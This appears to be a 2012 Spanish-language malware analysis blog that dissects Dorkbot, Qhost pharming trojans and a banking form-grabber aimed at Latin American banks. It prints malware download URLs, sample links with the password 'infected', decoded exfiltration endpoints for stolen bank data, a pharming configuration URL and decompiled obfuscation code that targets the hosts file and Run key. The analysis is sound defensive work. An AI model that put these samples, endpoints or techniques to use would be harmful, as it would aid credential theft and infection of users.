martes, 12 de junio de 2012

Dorkbot - Pineda Pedofilo y Gay.


  Un nuevo intento de atrapar incautos utilizando ingeniería social, la verdad no salgo de mi asombro...










Primera capa de UPX modificado.






C:\Program Files\Common Files\drlwszvxbeo.exe

DNS Query Text
api.wipmania.com IN A +
6699x.in IN A +
• HTTP Queries
HTTP Query Text
api.wipmania.com GET / HTTP/1.1

Análisis de Comodo.

http://camas.comodo.com/cgi-bin/submit?file=f246dde25ca8020e118308d5a436349c9484814fea3467689d40e50174a77d4c


GET / HTTP/1.1

User-Agent: Mozilla/4.0
Host: api.wipmania.com


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Jun 2012 18:30:45 GMT
Content-Type: text/html
Content-Length: 17
Connection: close
Set-Cookie: uid=xw/qB0/WOVU+onp/EwtHAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/


80.13.75.21
FR

Dumpeado con Ollydbg.






Aquí vemos como DorkBot infecta una unidad USB, crea una carpeta Recycled dentro de ella coloca una copia del troyano, luego oculta las carpetas que tengamos en la unidad usb, y creara accesos directos al troyano con el mismo nombre que nuestras carpetas.









Muestra: http://www.mediafire.com/?7spi4c3zaoktmgt




Podan encontrar el binario original, el binario sin UPX y el dump.




Es todo por el momento.




@Dkavalance    2012

sábado, 9 de junio de 2012

Qhost VI -  Pamela ha elegido una tarjeta para ti, en Terra.


Otro simple troyano que modifica el archivo host de la PC para hacer pharming y enviar a las victimas a un sitio de phishng, Esta vez, afecta a varias entidades bancarias de Chile  y Colombia, sumado a Hotmail y Gmail.






Link: hxxp://www.foresthousebaguio.com/tride/Imagenes/OpenSSL/Metro/id=143V10.exe

Análisis en VT.




Encontramos una cadenas en hexa, por lo que imagino que debe ser la configuración.




La pasamos a texto....y podemos observar la url donde ira a buscar la configuración para modificar el archivo host.














Eso es todo por el momento.



@Dkavalanche    2012

miércoles, 6 de junio de 2012

Troyano de Formulario III, Falso Comprobante de deposito.


En el día de hoy como en otra ocasión, volvieron a la carga con la ingeniería social, aplicada a un falso comprobante de deposito.


Correo enviado a las victimas.






El link nos lleva a un Url y luego nos redirige a otra Url donde nos descarga un archivo ejecutable con un icono de una carpeta.











El Análisis de VT nos arroja un indice bajo de detecciones.






El análisis en comodo nos reporta que intenta descargar un archivo .gif que en realidad se trata de un ejecutable. Por lo que se trata de un Dowloader.



Este downloader esta empaquetado con UPX y compilado con Delphi.






Archivo que intenta descargar:
www.rafaelrosa.com.br/rafaelrosa/fotos/1/1/100_g.jpg1/a.gif






Le cambiamos la extensión a .exe y lo subimos a VT.


El ejecutable no tiene Packer y esta compilado en Delphi 2010






Estos son algunos de los formularios desplegados por esta amenaza.










Pedido de Tarjeta de Coordenadas. 

Y pensar que hay gente que carga todos los datos....








Afecta a seis entidades Bancarias Argentinas






Manera en que serán enviados y presentados los datos al estafador.

















El troyano tiene las siguientes cadenas:


AD4F965A86F2110B3294C67FAE2B68F666A692F763D154BFDA3B3F3E2FCB679FFB1537E2162ECDAC56F82160F527DD00639332CB65CD6CEC2E15CF6A943B5A8F34E1
9A5A9B41FD0A0A72EF1A7DEF67AED355CE342867D2462F6AFF47F72CE11BD74B9842F129CB6583A29984A92DDC





Las cuales se encuentran codificadas y realmente indican las Urls donde serán enviados los datos robados.






Decodificadas:

http://static-98-141-57-164.dsl.cavtel.net/TrioWorks/mix/post.asp
http://184.105.229.146/_privat/contador2.asp









muestra en : http://www.mediafire.com/?ti4e159863r3eni


Password = infected






Eso es todo por el momento.




@DkAvalanche  2012



lunes, 4 de junio de 2012

Qhost: Analizando codificación de datos con Cryptool.


Ayer me enviaron para analizar el siguiente correo fraudulento, que descarga
un .zip que contiene un archivo .SCR






Link del malware hxxp://superteacheronline.com/extras/X/Mensaje_Multimedia(MMS).zip


Analizado en VT este ejecutable tiene un indice de 0/42










Analizando este .SCR encuentro que se trata de una utilidad para realizar instalaciones, por lo que este ejecutable en su interior contiene un .ZIP con otro ejecutable llamado FlashPlayer.exe 




Analizado el .exe con VT vemos que tiene un indice de 1/40 detecciones.




Este ejecutable esta programado en Vbasic 6, por lo que echaremos mano al Vbdecompiler.


En el código encontramos cosas como:


  loc_405C8D: LitI4 &H5C
  loc_405C92: ImpAdCallI2 Chr$(arg_1)
  loc_405C97: FStStrNoPop var_90
  loc_405C9A: ConcatStr
  loc_405C9B: FStStrNoPop var_94
  loc_405C9E: LitI4 &H73
  loc_405CA3: ImpAdCallI2 Chr$(arg_1)
  loc_405CA8: FStStrNoPop var_98
  loc_405CAB: ConcatStr
  loc_405CAC: FStStrNoPop var_9C
  loc_405CAF: LitI4 &H79
  loc_405CB4: ImpAdCallI2 Chr$(arg_1)
  loc_405CB9: FStStrNoPop var_A0
  loc_405CBC: ConcatStr
  loc_405CBD: FStStrNoPop var_A4
  loc_405CC0: LitI4 &H73
  loc_405CC5: ImpAdCallI2 Chr$(arg_1)
  loc_405CCA: FStStrNoPop var_A8
  loc_405CCD: ConcatStr
  loc_405CCE: FStStrNoPop var_AC
  loc_405CD1: LitI4 &H74
  loc_405CD6: ImpAdCallI2 Chr$(arg_1)
  loc_405CDB: FStStrNoPop var_B0
  loc_405CDE: ConcatStr
  loc_405CDF: FStStrNoPop var_B4
  loc_405CE2: LitI4 &H65
  loc_405CE7: ImpAdCallI2 Chr$(arg_1)
  loc_405CEC: FStStrNoPop var_D8
  loc_405CEF: ConcatStr
  loc_405CF0: FStStrNoPop var_DC
  loc_405CF3: LitI4 &H6D
  loc_405CF8: ImpAdCallI2 Chr$(arg_1)
  loc_405CFD: FStStrNoPop var_E0
  loc_405D00: ConcatStr
  loc_405D01: FStStrNoPop var_E4
  loc_405D04: LitI4 &H33
  loc_405D09: ImpAdCallI2 Chr$(arg_1)
  loc_405D0E: FStStrNoPop var_E8
  loc_405D11: ConcatStr
  loc_405D12: FStStrNoPop var_EC
  loc_405D15: LitI4 &H32
  loc_405D1A: ImpAdCallI2 Chr$(arg_1)
  loc_405D1F: FStStrNoPop var_F0
  loc_405D22: ConcatStr
  loc_405D23: FStStrNoPop var_F4
  loc_405D26: LitI4 &H5C
  loc_405D2B: ImpAdCallI2 Chr$(arg_1)
  loc_405D30: FStStrNoPop var_F8
  loc_405D33: ConcatStr
  loc_405D34: FStStrNoPop var_FC
  loc_405D37: LitI4 &H64
  loc_405D3C: ImpAdCallI2 Chr$(arg_1)
  loc_405D41: FStStrNoPop var_100
  loc_405D44: ConcatStr
  loc_405D45: FStStrNoPop var_104
  loc_405D48: LitI4 &H72
  loc_405D4D: ImpAdCallI2 Chr$(arg_1)
  loc_405D52: FStStrNoPop var_108
  loc_405D55: ConcatStr
  loc_405D56: FStStrNoPop var_10C
  loc_405D59: LitI4 &H69
  loc_405D5E: ImpAdCallI2 Chr$(arg_1)
  loc_405D63: FStStrNoPop var_110
  loc_405D66: ConcatStr
  loc_405D67: FStStrNoPop var_114
  loc_405D6A: LitI4 &H76
  loc_405D6F: ImpAdCallI2 Chr$(arg_1)
  loc_405D74: FStStrNoPop var_118
  loc_405D77: ConcatStr
  loc_405D78: FStStrNoPop var_11C
  loc_405D7B: LitI4 &H65
  loc_405D80: ImpAdCallI2 Chr$(arg_1)
  loc_405D85: FStStrNoPop var_120
  loc_405D88: ConcatStr
  loc_405D89: FStStrNoPop var_124
  loc_405D8C: LitI4 &H72
  loc_405D91: ImpAdCallI2 Chr$(arg_1)
  loc_405D96: FStStrNoPop var_128
  loc_405D99: ConcatStr
  loc_405D9A: FStStrNoPop var_12C
  loc_405D9D: LitI4 &H73
  loc_405DA2: ImpAdCallI2 Chr$(arg_1)
  loc_405DA7: FStStrNoPop var_130
  loc_405DAA: ConcatStr
  loc_405DAB: FStStrNoPop var_134
  loc_405DAE: LitI4 &H5C
  loc_405DB3: ImpAdCallI2 Chr$(arg_1)
  loc_405DB8: FStStrNoPop var_138
  loc_405DBB: ConcatStr
  loc_405DBC: FStStrNoPop var_13C
  loc_405DBF: LitI4 &H65
  loc_405DC4: ImpAdCallI2 Chr$(arg_1)
  loc_405DC9: FStStrNoPop var_140
  loc_405DCC: ConcatStr
  loc_405DCD: FStStrNoPop var_144
  loc_405DD0: LitI4 &H74
  loc_405DD5: ImpAdCallI2 Chr$(arg_1)
  loc_405DDA: FStStrNoPop var_148
  loc_405DDD: ConcatStr
  loc_405DDE: FStStrNoPop var_14C
  loc_405DE1: LitI4 &H63
  loc_405DE6: ImpAdCallI2 Chr$(arg_1)
  loc_405DEB: FStStrNoPop var_150
  loc_405DEE: ConcatStr
  loc_405DEF: FStStrNoPop var_154
  loc_405DF2: LitI4 &H5C
  loc_405DF7: ImpAdCallI2 Chr$(arg_1)
  loc_405DFC: FStStrNoPop var_158
  loc_405DFF: ConcatStr
  loc_405E00: FStStrNoPop var_15C
  loc_405E03: LitI4 &H68
  loc_405E08: ImpAdCallI2 Chr$(arg_1)
  loc_405E0D: FStStrNoPop var_160
  loc_405E10: ConcatStr
  loc_405E11: FStStrNoPop var_164
  loc_405E14: LitI4 &H6F
  loc_405E19: ImpAdCallI2 Chr$(arg_1)
  loc_405E1E: FStStrNoPop var_168
  loc_405E21: ConcatStr
  loc_405E22: FStStrNoPop var_16C
  loc_405E25: LitI4 &H73
  loc_405E2A: ImpAdCallI2 Chr$(arg_1)
  loc_405E2F: FStStrNoPop var_170
  loc_405E32: ConcatStr
  loc_405E33: FStStrNoPop var_174
  loc_405E36: LitI4 &H74
  loc_405E3B: ImpAdCallI2 Chr$(arg_1)
  loc_405E40: FStStrNoPop var_178
  loc_405E43: ConcatStr
  loc_405E44: FStStrNoPop var_17C
  loc_405E47: LitI4 &H73      



Si unimos todos los valores Hex nos queda

         5c73797374656d33325c647269766572735c6574635c686f737473

Pasado a Texto nos queda la cadena: \system32\drivers\etc\hosts





Otra cadena disimulada entra las variables:

  loc_406059: LitStr "H"
  loc_40606C: LitStr "K"
  loc_40607B: LitStr "E"
  loc_4060AA: LitStr "Y"
  loc_4060B9: LitStr "_"
  loc_4060D0: LitStr "L"
  loc_4060E7: LitStr "O"
  loc_40611E: LitStr "C"
  loc_406145: LitStr "A"
  loc_406164: LitStr "L"
  loc_40617B: LitStr "_"
  loc_406192: LitStr "M"
  loc_4061A9: LitStr "A"
  loc_4061C8: LitStr "C"
  loc_4061EF: LitStr "H"
  loc_406206: LitStr "I"
  loc_40622D: LitStr "N"
  loc_40625C: LitStr "E"
  loc_40628B: LitStr "\"
  loc_4062EA: LitStr "S"
  loc_406311: LitStr "O"
  loc_406348: LitStr "F"
  loc_40637E: LitStr "W"
  loc_40639D: LitStr "A"
  loc_4063BC: LitStr "R"
  loc_4063F3: LitStr "E"
  loc_406422: LitStr "\"
  loc_406481: LitStr "M"
  loc_406498: LitStr "I"
  loc_4064BF: LitStr "C"
  loc_4064E6: LitStr "R"
  loc_40651D: LitStr "O"
  loc_406554: LitStr "S"
  loc_40657B: LitStr "O"
  loc_4065B2: LitStr "F"
  loc_4065C9: LitStr "T"
  loc_4065E8: LitStr "\"
  loc_406647: LitStr "W"
  loc_406666: LitStr "I"
  loc_40668D: LitStr "N"
  loc_4066BC: LitStr "D"
  loc_4066CB: LitStr "O"
  loc_406702: LitStr "W"
  loc_406721: LitStr "S"
  loc_406748: LitStr "\"
  loc_4067A7: LitStr "C"
  loc_4067CE: LitStr "U"
  loc_4067E5: LitStr "R"
  loc_40681C: LitStr "R"
  loc_406853: LitStr "E"
  loc_406882: LitStr "N"
  loc_4068B1: LitStr "T"
  loc_4068D0: LitStr "V"
  loc_4068DF: LitStr "E"
  loc_40690E: LitStr "R"
  loc_406945: LitStr "S"
  loc_40696C: LitStr "I"
  loc_406993: LitStr "O"
  loc_4069CA: LitStr "N"
  loc_4069F9: LitStr "\"
  loc_406A58: LitStr "R"
  loc_406A8F: LitStr "U"
  loc_406AA6: LitStr "N"
  loc_406AD5: LitStr "\"
  loc_406B30: ConcatStr
  loc_406B31: FStStr var_88



LitI4 &H57
LitI4 &H73
LitI4 &H63
LitI4 &H72
LitI4 &H69
LitI4 &H70
LitI4 &H74
LitI4 &H2E
LitI4 &H73
LitI4 &H68
LitI4 &H65
LitI4 &H6C
LitI4 &H6C
LitI4 &H41
LitI4 &H70
LitI4 &H70
LitI4 &H2E
LitI4 &H45
LitI4 &H58
LitI4 &H45
LitI4 &H4E
LitI4 &H61
LitI4 &H6D
LitI4 &H65

577363726970742E7368656C6C4170702E4558454E616D65

Wscript.shellApp.EXEName



Utilización de la función StrReverse




  loc_405623: FLdRfVar var_98
  loc_405626: LitStr "exe.dnuos\metsys\"
  loc_405629: ImpAdCallI2 StrReverse

Queda como resultado del StrReverse : /system/sound.exe




Private Sub C0NF1GUR4C10N_Click() '40581C

  loc_405560: LitStr "/bmuht/ni.ecilagel//:ptth"
  loc_405563: ImpAdCallI2 StrReverse


http://legalice.in/thumb

Sitio donde toma la configuración para realizar el pharming modificando el etc/host





Con la siguiente rutina armara la URL donde buscara la configuracion:

Private Sub B0_T0_N1_Click() '4045F8
  'Data Table: 402044
  loc_4045A0: ImpAdCallFPR4 Proc_3_1_404F74()
  loc_4045A5: FLdPr Me
  loc_4045A8: MemLdStr global_80
  loc_4045AB: LitStr "_bmuht"                  <---- thumb_
  loc_4045AE: ImpAdCallI2 StrReverse
  loc_4045B3: FStStrNoPop var_88
  loc_4045B6: ConcatStr
  loc_4045B7: FStStrNoPop var_8C
  loc_4045BA: ImpAdLdI4 MemVar_408030          <---  thumb_ + MemVar_408030   
  loc_4045BD: ConcatStr
  loc_4045BE: FStStrNoPop var_90
  loc_4045C1: LitStr "gpj."                    <--- .jpg
  loc_4045C4: ImpAdCallI2 StrReverse
  loc_4045C9: FStStrNoPop var_94
  loc_4045CC: ConcatStr
  loc_4045CD: CVarStr var_A4
  loc_4045D0: PopAdLdVar
  loc_4045D1: FLdPrThis
  loc_4045D2: VCallAd M0_d0_l0
  loc_4045D5: FStAdFunc var_B8
  loc_4045D8: FLdPr var_B8
  loc_4045DB: LateIdCall
  loc_4045E3: FFreeStr var_88 = "": var_8C = "": var_90 = "" = ""
  loc_4045EE: FFree1Ad var_B8
  loc_4045F1: FFree1Var var_A4 = ""
  loc_4045F4: ExitProcHresult
End Sub


Queda: http://legalice.in/thumb/thumb_38BA2BE7.jpg

 MemVar_408030  es un valor en hexa (38BA2BE7) que va variando y no modifica la URL mostrada.



Si consultamos esta URL, en malzilla el servidor nos mostrara:


HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 813
Connection: close
Date: Mon, 04 Jun 2012 20:39:08 GMT
Server: LiteSpeed
X-Powered-By: PHP/5.3.10

*'Jvw.ypno{'/j0'8@@:48@@@'Tpjyvzvm{'Jvyw5..*..*'.z{l'lz'|u'lqltwsv'kl'hyjop}v'OVZ[Z'|zhkv'wvy'Tpjyvzvm{'[JW6PW'whyh'^pukv~z5..*..*'Lz{l'hyjop}v'jvu{plul'shz'hzpnuhjpvulz'kl'shz'kpyljjpvulz'PW'h'svz'uvtiylz'kl..*'ovz{5'Jhkh'lu{yhkh'klil'wlythuljly'lu'|uh's.ulh'pukp}pk|hs5'Sh'kpyljjp.u'PW..*'klil'wvulyzl'lu'sh'wyptlyh'jvs|tuh3'zln|pkh'kls'uvtiyl'kl'ovz{'jvyylzwvukplu{l5..*'Sh'kpyljjp.u'PW'.'ls'uvtiyl'kl'ovz{'klilu'zlwhyhyzl'jvu'hs'tluvz'|u'lzwhjpv5..*'..*..*'[htip.u'w|lklu'puzly{hyzl'jvtlu{hypvz'/jvtv'.z{l0'lu's.ulhz'pukp}pk|hslz..*'v'h'jvu{pu|hjp.u'kls'uvtiyl'kl'lx|pwv'pukpj.ukvsvz'jvu'ls'z.tivsv'*..*..*'Wvy'lqltwsvA..*..*''''''8795<;5@;5@>'''''yopuv5hjtl5jvt''''''''''*'zly}pkvy'vypnlu..*''''''':?59<5=:587'''''5hjtl5jvt''''''''''''''*'ovz{'jsplu{l'....89>575758'''''''svjhsovz{



Por lo que deduzco que todo lo que esta dentro de Iniciop y Finp es el archivo .HOST que sera guardado en la PC de la victima.


Aquí donde utilizaremos la herramienta Cryptool




Primero cargamos el texto comprendido entre Inicio y Fin


Luego

Análisis -> Cifrado Simétrico (Clasico) -> Solo Texto Cifrado -> Suma de Bytes





El análisis nos indica que la clave con suma de bytes es 27.............



Y................................................... Listo....................






Parece que el sitio de pharming todavía no fue cargado por el defraudador.



Pueden descargar la amenaza y el de-compilado .bas desde


Pass = infected

Eso es todo por el momento.


@DkAvalanche   2012







 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!